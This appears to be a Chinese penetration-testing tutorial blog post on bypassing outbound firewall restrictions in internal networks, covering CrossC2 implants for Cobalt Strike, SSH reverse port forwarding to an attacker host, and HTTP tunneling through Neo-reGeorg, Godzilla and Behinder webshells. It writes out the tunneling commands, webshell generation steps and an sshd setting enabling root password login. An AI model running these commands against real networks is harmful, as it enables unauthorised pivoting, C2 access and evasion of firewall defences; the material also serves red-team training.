内网对抗-隧道技术篇&防火墙组策略&HTTP反向&SSH转发&出网穿透&CrossC2&解决方案

知识点:

bash 复制代码
1、C2/C2上线-CrossC2插件-多系统平台支持
2、隧道技术篇-应用层-SSH协议-判断&封装&建立&穿透
3、隧道技术篇-应用层-HTTP协议-判断&封装&建立&穿透

隧道技术主要解决网络通讯问题:遇到防火墙就用隧道技术,如果没有防火墙纯内网就用socks代理。



一、演示案例-C2上线-多平台系统-CrossC2项目&Linux&Mac&IOS&Android

该插件目前支持Linux&Mac上线(IOS&Android暂未支持,未来版本支持)
https://github.com/gloxec/CrossC2

使用参考:
https://gloxec.github.io/CrossC2/zh_cn/

目前版本只支持反向的https和正向的tcp

1、下载对应版本加载器和CNA插件

2、上传加载器文件和本地加载CNA插件


3、修改CNA插件配置路径

4、使用命令或插件绑定HTTPS监听器生成

一、插件绑定HTTPS监听器生成(修改cna配置文件的情况下)


二、命令(未修改cna配置文件的情况下)

插件绑定HTTPS监听器生成木马,就会有条命令,复制这个命令在攻击机终端生成即可




二、演示案例-隧道技术-SSH转发-出站限制&信息收集

bash 复制代码
SSH 隧道搭建内网穿透:(解决目标出站限制做信息收集)
注:windows也可以支持ssh,需要单独安装该服务罢了。
由于CS无SSH协议监听器配置,无法上线cs。

1、环境复现搭建

bash 复制代码
如:模拟Linux为被控机,配置防火墙策略
iptables -F /* 清除所有规则 */
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /*保存配置*/
iptables -L /* 显示iptables列表 */

如:模拟Windows为被控机,配置防火墙策略:SSH 22端口放行

自己的服务器记得开启ssh协议登录:
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart

2、适用场景

内网主机防火墙限制了出网协议,可以利用SSH转发流量实现内网穿透

3、需要条件:(解决目标出站限制)

bash 复制代码
被控主机需支持SSH协议(Windows需要安装支持软件)
将2.22上80端口流量转发到xx.xx上的1234端口(xx.xx就是攻击机)
ssh -CfNg -R 1234:192.168.2.22:80 root@xx.xx.xx.xx

攻击机上:

bash 复制代码
curL http://127.0.0.1:1234

三、演示案例-隧道技术-HTTP反向-出站限制&信息收集&上线

情况1-HTTP隧道搭建内网穿透:(解决目标出站限制做信息收集)

一、项目Neo-reGeorg(把数据封装成http/https隧道)

https://github.com/L-codes/Neo-reGeorg

1、设置密码生成(aspx|ashx|jsp|jspx|php)并上传

bash 复制代码
python neoreg.py generate -k password


2、使用 neoreg.py 连接 WEB 服务器,在本地建立 socks5 代理

bash 复制代码
python3 neoreg.py -k password -u http://xx/tunnel.php


3、Proxifier添加socks5服务器并配置连接规则测试



二、哥斯拉&冰蝎-内网穿透

哥斯拉:HttpProxy


冰蝎:内网穿透




情况2-HTTP隧道搭建上线C2:(解决目标出站限制上线C2)

太多时候遇到目标不出网了,TCP、ICMP、DNS协议均不通,

无法直接与公网的CS/MSF/Sliverd等其他C2服务端建立连接。




使用HTTP隧道上线c2没什么必要,直接用正反向上线就行(正反向能上线,那么http隧道也能上线,正反向不能上线,http隧道也不能上线)

相关推荐
林深的林4 小时前
Http证书体系及证书加密流程(通信流程)
网络协议·http·https
自由鬼13 小时前
Apache HTTP Server 2.4.49 的目录遍历漏洞CVE-2021-41773
网络协议·http·apache
Lucky高16 小时前
HTTP和HTTPS复习
网络协议·http·https
喵手1 天前
Java 11 新特性:从模块化到 HTTP/2 深度解析
java·开发语言·http
贺贺丿2 天前
Docker4-容器化企业级应用
linux·nginx·docker·云原生·eureka·tomcat·ssh
彦楠2 天前
win通过OpenSSL生成.ssh id_rsa密钥方法
运维·ssh
猫头虎2 天前
[精选] 2025最新生成 SSH 密钥和 SSL 证书的标准流程(Linux/macOS/Windows系统服务器通用方案)
linux·服务器·开发语言·macos·ssh·ssl·ai编程
菜鸟是大神2 天前
【已解决】docker: Error response from daemon: Get “https://registry-1.docker.io/v2/“: net/http: request c
http·docker·容器
Arwen3032 天前
从 “http” 到 “https”:只差一张 SSL
http·https·ssl
handsomestWei3 天前
大华设备netsdk http服务封装
http·netsdk·大华·门禁